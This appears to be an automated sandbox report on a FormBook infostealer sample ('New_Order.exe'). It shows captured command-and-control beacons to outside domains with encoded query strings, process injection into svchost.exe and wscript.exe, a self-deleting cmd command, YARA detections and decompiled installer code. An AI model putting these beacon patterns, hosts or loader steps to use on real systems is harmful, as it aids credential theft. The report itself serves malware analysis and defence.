                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 
72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67
                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-heig
May 12, 2021 06:11:13.647696972 CEST | 1339 | IN | Data Raw: 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65
                                                                      Data Ascii: ht:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-bloc
May 12, 2021 06:11:13.647722960 CEST | 1340 | IN | Data Raw: 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65
                                                                      Data Ascii: para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
May 12, 2021 06:11:13.647748947 CEST | 1341 | IN | Data Raw: 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95
                                                                      Data Ascii: itle": " ", "content-title": " " }, "ja": { "tit
May 12, 2021 06:11:13.647768021 CEST | 1342 | IN | Data Raw: 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c
                                                                      Data Ascii: s = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } //
May 12, 2021 06:11:13.648022890 CEST | 1342 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49720 | 85.233.160.22 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:11:18.796605110 CEST | 1343 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1
Host: www.websitemax.co.uk
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
May 12, 2021 06:11:18.849797010 CEST | 1344 | IN | HTTP/1.1 200 OK
Date: Wed, 12 May 2021 04:11:18 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 31 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 62 6f 64 79 2c 20 68 74 6d 6c 0a 09 7b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 09 7d 0a 09 23 63 6f 6e 74 65 6e 74 0a 09 7b 0a 09 09 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 6c 65 66 74 3a 20 30 3b 20 72 69 67 68 74 3a 20 30 3b 20 62 6f 74 74 6f 6d 3a 20 30 3b 20 74 6f 70 3a 20 30 70 78 3b 0a 09 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 3c 69 66 72 61 6d 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 63 6e 2e 63 6f 6d 2f 70 61 72 6b 65 64 2d 64 6f 6d 61 69 6e 73 2f 69 6e 64 65 78 3f 2f 3d 2f 64 6f 6d 61 69 6e 2f 77 65 62 73 69 74 65 6d 61 78 2e 63 6f 2e 75 6b 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 1e9<!DOCTYPE html><html><head><title>websitemax.co.uk</title><style type="text/css">body, html{margin: 0; padding: 0; height: 100%; overflow: hidden;}#content{position:absolute; left: 0; right: 0; bottom: 0; top: 0px;}</style><meta name="robots" content="noindex, nofollow"></head><body><div id="content"><iframe width="100%" height="100%" frameborder="0" src="https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk"></iframe></div></body></html>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      5192.168.2.549724150.95.255.3880C:\Windows\explorer.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      May 12, 2021 06:11:24.480335951 CEST2828OUTGET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.year-action.xyz
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
May 12, 2021 06:11:24.793498039 CEST | 3343 | IN | HTTP/1.1 302 Found
                                                                      Date: Wed, 12 May 2021 04:11:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                      Location: http://dfltweb1.onamae.com
                                                                      Content-Length: 210
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49725 | Destination IP: 8.210.40.49 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:11:30.171286106 CEST | 5182 | OUT | GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1
                                                                      Host: www.hdjakdhf.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
May 12, 2021 06:11:30.448025942 CEST | 5182 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Wed, 12 May 2021 04:11:30 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49727 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
May 12, 2021 06:11:45.772072077 CEST | 5217 | OUT | GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1
                                                                      Host: www.susanestuart.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
May 12, 2021 06:11:45.909532070 CEST | 5217 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Wed, 12 May 2021 04:11:45 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "609953da-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage


                                                                      Memory Usage


                                                                      High Level Behavior Distribution


                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:06:09:42
                                                                      Start date:12/05/2021
                                                                      Path:C:\Users\user\Desktop\New_Order.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x400000
                                                                      File size:344003 bytes
                                                                      MD5 hash:74E4EB9AFBF8F9C9B285A46CED831979
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      General

                                                                      Start time:06:09:43
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\New_Order.exe'
                                                                      Imagebase:0x180000
                                                                      File size:44520 bytes
                                                                      MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:09:48
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\explorer.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:
                                                                      Imagebase:0x7ff693d90000
                                                                      File size:3933184 bytes
                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:01
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                      Imagebase:0x1260000
                                                                      File size:147456 bytes
                                                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:/c del 'C:\Windows\SysWOW64\svchost.exe'
                                                                      Imagebase:0x290000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:06:10:06
                                                                      Start date:12/05/2021
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7ecfc0000
                                                                      File size:625664 bytes
                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis


                                                                        Executed Functions

                                                                        C-Code - Quality: 86%
                                                                        			_entry_() {
                                                                        				signed int _t42;
                                                                        				intOrPtr* _t47;
                                                                        				CHAR* _t51;
                                                                        				char* _t53;
                                                                        				CHAR* _t55;
                                                                        				void* _t59;
                                                                        				intOrPtr _t61;
                                                                        				int _t63;
                                                                        				int _t66;
                                                                        				signed int _t67;
                                                                        				int _t68;
                                                                        				signed int _t70;
                                                                        				void* _t94;
                                                                        				signed int _t110;
                                                                        				void* _t113;
                                                                        				void* _t118;
                                                                        				intOrPtr* _t119;
                                                                        				char _t122;
                                                                        				signed int _t141;
                                                                        				signed int _t142;
                                                                        				int _t150;
                                                                        				void* _t151;
                                                                        				intOrPtr* _t153;
                                                                        				CHAR* _t156;
                                                                        				CHAR* _t157;
                                                                        				void* _t159;
                                                                        				char* _t160;
                                                                        				void* _t163;
                                                                        				void* _t164;
                                                                        				char _t189;
                                                                        
                                                                        				 *(_t164 + 0x18) = 0;
                                                                        				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                                                        				 *(_t164 + 0x20) = 0;
                                                                        				 *(_t164 + 0x14) = 0x20;
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				_t42 = GetVersion() & 0xbfffffff;
                                                                        				 *0x42f42c = _t42;
                                                                        				if(_t42 != 6) {
                                                                        					_t119 = E00406500(0);
                                                                        					if(_t119 != 0) {
                                                                        						 *_t119(0xc00);
                                                                        					}
                                                                        				}
                                                                        				_t156 = "UXTHEME";
                                                                        				do {
                                                                        					E00406492(_t156); // executed
                                                                        					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
                                                                        				} while ( *_t156 != 0);
                                                                        				E00406500(0xb);
                                                                        				 *0x42f424 = E00406500(9);
                                                                        				_t47 = E00406500(7);
                                                                        				if(_t47 != 0) {
                                                                        					_t47 =  *_t47(0x1e);
                                                                        					if(_t47 != 0) {
                                                                        						 *0x42f42f =  *0x42f42f | 0x00000040;
                                                                        					}
                                                                        				}
                                                                        				__imp__#17(_t159);
                                                                        				__imp__OleInitialize(0); // executed
                                                                        				 *0x42f4f8 = _t47;
                                                                        				SHGetFileInfoA(0x429850, 0, _t164 + 0x38, 0x160, 0); // executed
                                                                        				E004060F7("Lat Setup", "NSIS Error");
                                                                        				_t51 = GetCommandLineA();
                                                                        				_t160 = "\"C:\\Users\\alfons\\Desktop\\New_Order.exe\" ";
                                                                        				E004060F7(_t160, _t51);
                                                                        				 *0x42f420 = 0x400000;
                                                                        				_t53 = _t160;
                                                                        				if("\"C:\\Users\\alfons\\Desktop\\New_Order.exe\" " == 0x22) {
                                                                        					 *(_t164 + 0x14) = 0x22;
                                                                        					_t53 =  &M00435001;
                                                                        				}
                                                                        				_t55 = CharNextA(E00405ABA(_t53,  *(_t164 + 0x14)));
                                                                        				 *(_t164 + 0x1c) = _t55;
                                                                        				while(1) {
                                                                        					_t122 =  *_t55;
                                                                        					_t172 = _t122;
                                                                        					if(_t122 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					__eflags = _t122 - 0x20;
                                                                        					if(_t122 != 0x20) {
                                                                        						L13:
                                                                        						__eflags =  *_t55 - 0x22;
                                                                        						 *(_t164 + 0x14) = 0x20;
                                                                        						if( *_t55 == 0x22) {
                                                                        							_t55 =  &(_t55[1]);
                                                                        							__eflags = _t55;
                                                                        							 *(_t164 + 0x14) = 0x22;
                                                                        						}
                                                                        						__eflags =  *_t55 - 0x2f;
                                                                        						if( *_t55 != 0x2f) {
                                                                        							L25:
                                                                        							_t55 = E00405ABA(_t55,  *(_t164 + 0x14));
                                                                        							__eflags =  *_t55 - 0x22;
                                                                        							if(__eflags == 0) {
                                                                        								_t55 =  &(_t55[1]);
                                                                        								__eflags = _t55;
                                                                        							}
                                                                        							continue;
                                                                        						} else {
                                                                        							_t55 =  &(_t55[1]);
                                                                        							__eflags =  *_t55 - 0x53;
                                                                        							if( *_t55 != 0x53) {
                                                                        								L20:
                                                                        								__eflags =  *_t55 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
                                                                        								if( *_t55 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
                                                                        									L24:
                                                                        									__eflags =  *((intOrPtr*)(_t55 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
                                                                        									if( *((intOrPtr*)(_t55 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
                                                                        										 *((char*)(_t55 - 2)) = 0;
                                                                        										__eflags =  &(_t55[2]);
                                                                        										E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp",  &(_t55[2]));
                                                                        										L30:
                                                                        										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                                                        										GetTempPathA(0x400, _t157); // executed
                                                                        										_t59 = E00403317(_t172);
                                                                        										_t173 = _t59;
                                                                        										if(_t59 != 0) {
                                                                        											L33:
                                                                        											DeleteFileA("1033"); // executed
                                                                        											_t61 = E00402EA1(_t175,  *(_t164 + 0x20)); // executed
                                                                        											 *((intOrPtr*)(_t164 + 0x10)) = _t61;
                                                                        											if(_t61 != 0) {
                                                                        												L43:
                                                                        												E00403830();
                                                                        												__imp__OleUninitialize();
                                                                        												_t185 =  *((intOrPtr*)(_t164 + 0x10));
                                                                        												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
                                                                        													__eflags =  *0x42f4d4;
                                                                        													if( *0x42f4d4 == 0) {
                                                                        														L67:
                                                                        														_t63 =  *0x42f4ec;
                                                                        														__eflags = _t63 - 0xffffffff;
                                                                        														if(_t63 != 0xffffffff) {
                                                                        															 *(_t164 + 0x14) = _t63;
                                                                        														}
                                                                        														ExitProcess( *(_t164 + 0x14));
                                                                        													}
                                                                        													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
                                                                        													__eflags = _t66;
                                                                        													_t150 = 2;
                                                                        													if(_t66 != 0) {
                                                                        														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
                                                                        														 *(_t164 + 0x38) = 1;
                                                                        														 *(_t164 + 0x44) = _t150;
                                                                        														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
                                                                        													}
                                                                        													_t67 = E00406500(4);
                                                                        													__eflags = _t67;
                                                                        													if(_t67 == 0) {
                                                                        														L65:
                                                                        														_t68 = ExitWindowsEx(_t150, 0x80040002);
                                                                        														__eflags = _t68;
                                                                        														if(_t68 != 0) {
                                                                        															goto L67;
                                                                        														}
                                                                        														goto L66;
                                                                        													} else {
                                                                        														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
                                                                        														__eflags = _t70;
                                                                        														if(_t70 == 0) {
                                                                        															L66:
                                                                        															E0040140B(9);
                                                                        															goto L67;
                                                                        														}
                                                                        														goto L65;
                                                                        													}
                                                                        												}
                                                                        												E00405813( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
                                                                        												ExitProcess(2);
                                                                        											}
                                                                        											if( *0x42f440 == 0) {
                                                                        												L42:
                                                                        												 *0x42f4ec =  *0x42f4ec | 0xffffffff;
                                                                        												 *(_t164 + 0x18) = E0040390A( *0x42f4ec);
                                                                        												goto L43;
                                                                        											}
                                                                        											_t153 = E00405ABA(_t160, 0);
                                                                        											if(_t153 < _t160) {
                                                                        												L39:
                                                                        												_t182 = _t153 - _t160;
                                                                        												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
                                                                        												if(_t153 < _t160) {
                                                                        													_t151 = E0040577E(_t185);
                                                                        													lstrcatA(_t157, "~nsu");
                                                                        													if(_t151 != 0) {
                                                                        														lstrcatA(_t157, "A");
                                                                        													}
                                                                        													lstrcatA(_t157, ".tmp");
                                                                        													_t162 = "C:\\Users\\alfons\\Desktop";
                                                                        													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
                                                                        														_push(_t157);
                                                                        														if(_t151 == 0) {
                                                                        															E00405761();
                                                                        														} else {
                                                                        															E004056E4();
                                                                        														}
                                                                        														SetCurrentDirectoryA(_t157);
                                                                        														_t189 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                                                        														if(_t189 == 0) {
                                                                        															E004060F7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t162);
                                                                        														}
                                                                        														E004060F7(0x430000,  *(_t164 + 0x1c));
                                                                        														_t137 = "A";
                                                                        														_t163 = 0x1a;
                                                                        														 *0x430400 = "A";
                                                                        														do {
                                                                        															E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x120)));
                                                                        															DeleteFileA(0x429450);
                                                                        															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\New_Order.exe", 0x429450, 1) != 0) {
                                                                        																E00405ED6(_t137, 0x429450, 0);
                                                                        																E0040618A(0, 0x429450, _t157, 0x429450,  *((intOrPtr*)( *0x42f434 + 0x124)));
